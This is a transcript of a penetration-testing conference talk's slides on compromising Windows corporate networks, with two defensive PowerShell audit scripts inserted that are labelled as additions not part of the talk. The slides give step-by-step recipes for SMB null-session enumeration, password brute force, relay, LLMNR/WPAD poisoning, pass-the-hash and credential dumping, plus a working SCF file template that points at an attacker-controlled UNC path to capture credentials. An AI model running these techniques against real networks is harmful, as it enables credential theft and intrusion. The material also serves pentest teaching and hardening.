pwning corporate networks in a single day by paulino calderon pale

Post on 08-Jan-2017


TRANSCRIPT

PWNING NETWORKS IN A SINGLE DAY

#CAT /ETC/ABOUT

Paulino Calderón Pale
Twitter: @calderpwn
GitHub: github.com/cldrn/
www.calderonpale.com

THINGS I LEARNED

• 99% of the time it will be Windows.
• Most of the vulnerabilities are unknown until companies get professional help.
• No one knows what software is installed.
• Default configurations are dangerous.

[Figure: SMB dialect timeline, versions 1.0, 2.0, 2.1, 3.0 and 3.02]

SMB IS OUR FRIEND

SMB is the most targeted protocol in Windows networks.

With SMB:
• Obtain OS and Active Directory information.
• Steal user network credentials.
• Access shared folders.
• Test credentials.
• Execute commands or binaries remotely (PsExec, WMI, PowerShell…)
• A lot of vulnerable implementations (servers and clients)…

DOMAIN CONTROLLERS

• A lot of domain controllers accept null sessions.
• This insecure configuration reveals information about users and groups.
• We can use this vulnerability to target high privileged users.

OBTAINING INFORMATION FROM A DOMAIN CONTROLLER

enum4linux 0.9 saves users in text files divided by domain groups. The output can be used by Nmap and Metasploit.
Download: https://github.com/cldrn/enum4linux-0.9

[Screenshot: enum4linux output listing DOMAIN\USER entries]

OBTAINING INFORMATION FROM DOMAIN CONTROLLERS

polenum obtains the password policy for a domain.
Download from https://labs.portcullis.co.uk/tools/polenum/

“QUICKPWN”

• Identify DCs.
• Execute enum4linux 0.9: $ enum4linux -a <IP>
• Execute polenum to obtain the password and account lockout policies: polenum <IP>
• Launch a brute force attack to find accounts with weak passwords:
  Metasploit: auxiliary/scanner/smb/smb_login
  Nmap: smb-brute

SHARED FOLDERS

• Enabled to allow people to share files over the network.
• Not uncommon to find sensitive information stored there.

“QUICKPWN”

• Find sensitive information in shared folders:
  • FileLocator Lite or Pro (www.mythicsoft.com)
  • SMBMap

STEALING USER CREDENTIALS

• There are several techniques that can be used to abuse shared folders to obtain user credentials.
• No patch (vulnerable by design).

THE CLASSIC SMB CAPTURE ATTACK

As easy as setting up an SMB server and waiting for users to send us their domain credentials…

DEMO

Who has the time to wait?

UNC PATHS

\\<MACHINE>\<FOLDER>\<FILE>

Where can we use UNC paths?

• Web applications / SharePoint / your own web server
• SQL queries
• Office documents
• lmhosts.sam <- host your own malicious hosts file
• LNK files
• SCF files <- easier to create than LNK files

“QUICKPWN”

• Find a shared folder with write permissions.
• Upload a file containing a UNC path pointing to your SMB server.
• Wait for the credentials…

SCF FILES

[Shell]
Command=2
IconFile=\\<IP ADDRESS>\share\pwn.ico
[Taskbar]
Command=ToggleDesktop
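Defensive counterpart to the SCF and UNC-path slides above, added here and not part of the talk: a PowerShell scan of a share for .scf/.url files whose IconFile line points at a host outside your own servers (a raw IP or an unlisted name). The share path and the allowed host list are assumptions; replace them with your own.

```powershell
# Added example, not from the talk. Scans a share for INI-style .scf/.url files whose
# IconFile= line references a UNC path; Explorer authenticates to that host as soon as
# the folder is opened, which is exactly what the capture attack relies on.
param(
    [string]$SharePath    = '\\FILESERVER\public',        # assumed share to audit
    [string[]]$AllowedHosts = @('FILESERVER', 'DC01')      # assumed legitimate UNC hosts
)

function Get-SuspiciousIconFiles {
    param([string]$Root, [string[]]$Allowed)
    # -Force also returns hidden files, the usual way a planted .scf is disguised.
    Get-ChildItem -Path $Root -Recurse -Force -Include *.scf, *.url -ErrorAction SilentlyContinue |
      ForEach-Object {
        $file = $_
        # Capture the host component of IconFile=\\host\share\name.ico
        Select-String -Path $file.FullName -Pattern '^\s*IconFile\s*=\s*\\\\([^\\]+)\\' |
          ForEach-Object {
            $targetHost = $_.Matches[0].Groups[1].Value
            $isIp  = $targetHost -match '^\d{1,3}(\.\d{1,3}){3}$'
            $known = $Allowed -contains $targetHost      # case-insensitive in PowerShell
            if ($isIp -or -not $known) {
                [pscustomobject]@{
                    File       = $file.FullName
                    LastWrite  = $file.LastWriteTime
                    Owner      = (Get-Acl -Path $file.FullName).Owner   # who dropped it
                    TargetHost = $targetHost
                    Reason     = if ($isIp) { 'raw IP in UNC path' } else { 'host not in allow list' }
                }
            }
          }
      }
}

Get-SuspiciousIconFiles -Root $SharePath -Allowed $AllowedHosts | Format-Table -AutoSize
```

Owner and LastWrite give the starting point for the incident timeline; removing write permission for "Everyone"/"Authenticated Users" on the share closes the drop point.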

DEMO

SMB RELAY ATTACKS

If SMB signing is disabled, SMB relay attacks are possible.

99.9% of the time SMB signing is disabled on Windows workstations. (Default configuration)

DEMO

“QUICKPWN”

• Find a shared folder with write permissions.
• Upload a file with a UNC path pointing to your own SMB server.
• Use smbrelayx.py to redirect the connection to your victim and gain access to the machine when a user with enough privileges connects…

CAN YOU FORCE USERS TO CONNECT TO US?

• The previous attack techniques needed:
  • Users connecting to our SMB server
  • Access to a shared folder with write permissions

But can we use poisoning attacks to force users to connect to us?

THANK YOU WPAD

• Enabled by default in all Windows versions.
• Designed to auto-configure proxies in networks.
• Internet Options > LAN Settings > Automatically detect settings

LLMNR AND NBT-NS

• Enabled in most Windows machines.
• LLMNR (Link-Local Multicast Name Resolution) <- starting from Windows Vista
• NBT-NS (NetBIOS Name Service)
• Allowed in a lot of networks with restrictive access.

“QUICKPWN”

• Detect WPAD/LLMNR/NBT-NS requests on the network.
• Launch an SMB server to capture user credentials.
• Force users to connect to you through poisoning attacks.
• Capture the user credentials.

DEMO

DEMO

DEMO

PASS THE HASH

• It has been around for almost 20 years now.
• A lot of Windows protocols require the hash of the password but not the actual password to authenticate.
• A lot of tools available support PtH:
  • pth-winexe, mimikatz
  • Metasploit: psexec_command, psexec

PTH AGAINST RDP

Microsoft introduced "Restricted Admin" mode; now we can use PtH against RDP in Windows 2012 R2 and Windows 8.1. (Only admin)

MEET PSEXEC

• Useful to locate systems that share passwords.
• Runs commands or binaries remotely on machines.
• It is very noisy.

DEMO

WDIGEST

• Auth system that requires that Windows stores a plaintext version of the passwords in memory.
• WCE, mimikatz FTW

CREDMAP – THE CREDENTIAL MAPPER

Developed by Roberto Salgado from Websec to quickly test credentials against different services online.
Download: https://github.com/lightos/credmap

DEMO

WMI

• PsExec alternative
• Does not start a service
• Does not touch the disk
• In Kali: wmiexec and pth-wmis

PENTESTERS LOVE POWERSHELL

PowerShell can be used from network reconnaissance to privilege escalation.

Projects worth mentioning:
• PowerSploit: https://github.com/PowerShellMafia/PowerSploit/
• Empire: http://www.powershellempire.com

SMB1 VS SMB2 VS SMB3

• Most tools only work with SMB1. (For now)
• SMB2 removes OS fingerprint information pre-auth.
• SMB3 finally introduces message encryption.
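The defaults this talk leans on (null sessions, SMB signing off, SMB1, LLMNR, NBT-NS, WDigest plaintext caching, WPAD) can be checked in one pass. The following read-only audit script is an added example, not from the talk; it assumes PowerShell 5 or later, an elevated session, and the SmbShare module (Windows 8 / Server 2012 or later). The remediation strings are the author's suggested fixes, not output of any tool.

```powershell
# Added example, not from the talk: report the weak-by-default settings; changes nothing.
function Get-RegValue([string]$Path, [string]$Name) {
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}
$findings = New-Object System.Collections.ArrayList
function Add-Finding([string]$Check, $Value, [bool]$Ok, [string]$Fix) {
    $status = if ($Ok) { 'OK' } else { 'WEAK' }
    [void]$findings.Add([pscustomobject]@{ Check = $Check; Value = $Value; Status = $status; Fix = $Fix })
}

# SMB signing: relay only works when server or client does not require it.
$srv = Get-SmbServerConfiguration
$cli = Get-SmbClientConfiguration
Add-Finding 'SMB server requires signing' $srv.RequireSecuritySignature $srv.RequireSecuritySignature `
    'Set-SmbServerConfiguration -RequireSecuritySignature $true'
Add-Finding 'SMB client requires signing' $cli.RequireSecuritySignature $cli.RequireSecuritySignature `
    'Set-SmbClientConfiguration -RequireSecuritySignature $true'

# SMB1: the dialect most tooling speaks; SMB2+ also hides pre-auth OS details.
Add-Finding 'SMB1 disabled' (-not $srv.EnableSMB1Protocol) (-not $srv.EnableSMB1Protocol) `
    'Set-SmbServerConfiguration -EnableSMB1Protocol $false'

# LLMNR: policy value EnableMulticast=0 turns multicast name resolution off (absent = on).
$llmnr = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast'
Add-Finding 'LLMNR disabled' $llmnr ($llmnr -eq 0) 'GPO: Turn off multicast name resolution (EnableMulticast=0)'

# NBT-NS: NetbiosOptions=2 disables NetBIOS over TCP/IP, set per interface.
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' | ForEach-Object {
    $opt = Get-RegValue $_.PSPath 'NetbiosOptions'
    Add-Finding "NBT-NS disabled on $($_.PSChildName)" $opt ($opt -eq 2) 'Set NetbiosOptions=2 (adapter WINS settings)'
}

# WDigest: UseLogonCredential=1 keeps plaintext passwords in LSASS; require an explicit 0.
$wd = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
Add-Finding 'WDigest plaintext caching off' $wd ($wd -eq 0) 'Set UseLogonCredential=0 under SecurityProviders\WDigest'

# Null sessions: anonymous enumeration of users and groups (RestrictAnonymousSAM is ignored on DCs).
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ra  = Get-RegValue $lsa 'RestrictAnonymous'; $ras = Get-RegValue $lsa 'RestrictAnonymousSAM'
Add-Finding 'RestrictAnonymous'    $ra  ($ra -ge 1)  'Set RestrictAnonymous=1 (Lsa)'
Add-Finding 'RestrictAnonymousSAM' $ras ($ras -eq 1) 'Set RestrictAnonymousSAM=1 (Lsa)'

# WPAD: Start=4 means the WinHTTP auto-proxy service is disabled; IE auto-detect is a GPO setting.
$wpad = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc' 'Start'
Add-Finding 'WPAD auto-proxy service disabled' $wpad ($wpad -eq 4) 'Disable proxy auto-detection via GPO'

$findings | Format-Table -AutoSize
```

Anything reported as WEAK is a setting the slides above turn into credential capture, relay or plaintext recovery; on domain-joined hosts apply the fixes through Group Policy so they survive re-imaging.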

DEMO

OTHER “QUICKPWNS”

• Golden Ticket (Kerberos)
• Outdated software
• Services with excessive permissions
• Misconfigured network printers
• Development environments with insecure configurations
• Insecure update systems (*)

DEMO

What other vulnerabilities are worth mentioning?

SPAM

OWASP RIVIERA MAYA

NMAP: NETWORK EXPLORATION AND SECURITY AUDITING COOKBOOK 2ND EDITION

WEBSEC OFFICIAL CHANNELS

• WWW: www.websec.mx
• YouTube: youtube.com/websecmx
• Facebook: websec.mx
• Twitter: @_websec

CONTACT

Paulino Calderón Pale
Twitter: @calderpwn
GitHub: github.com/cldrn/
www.calderonpale.com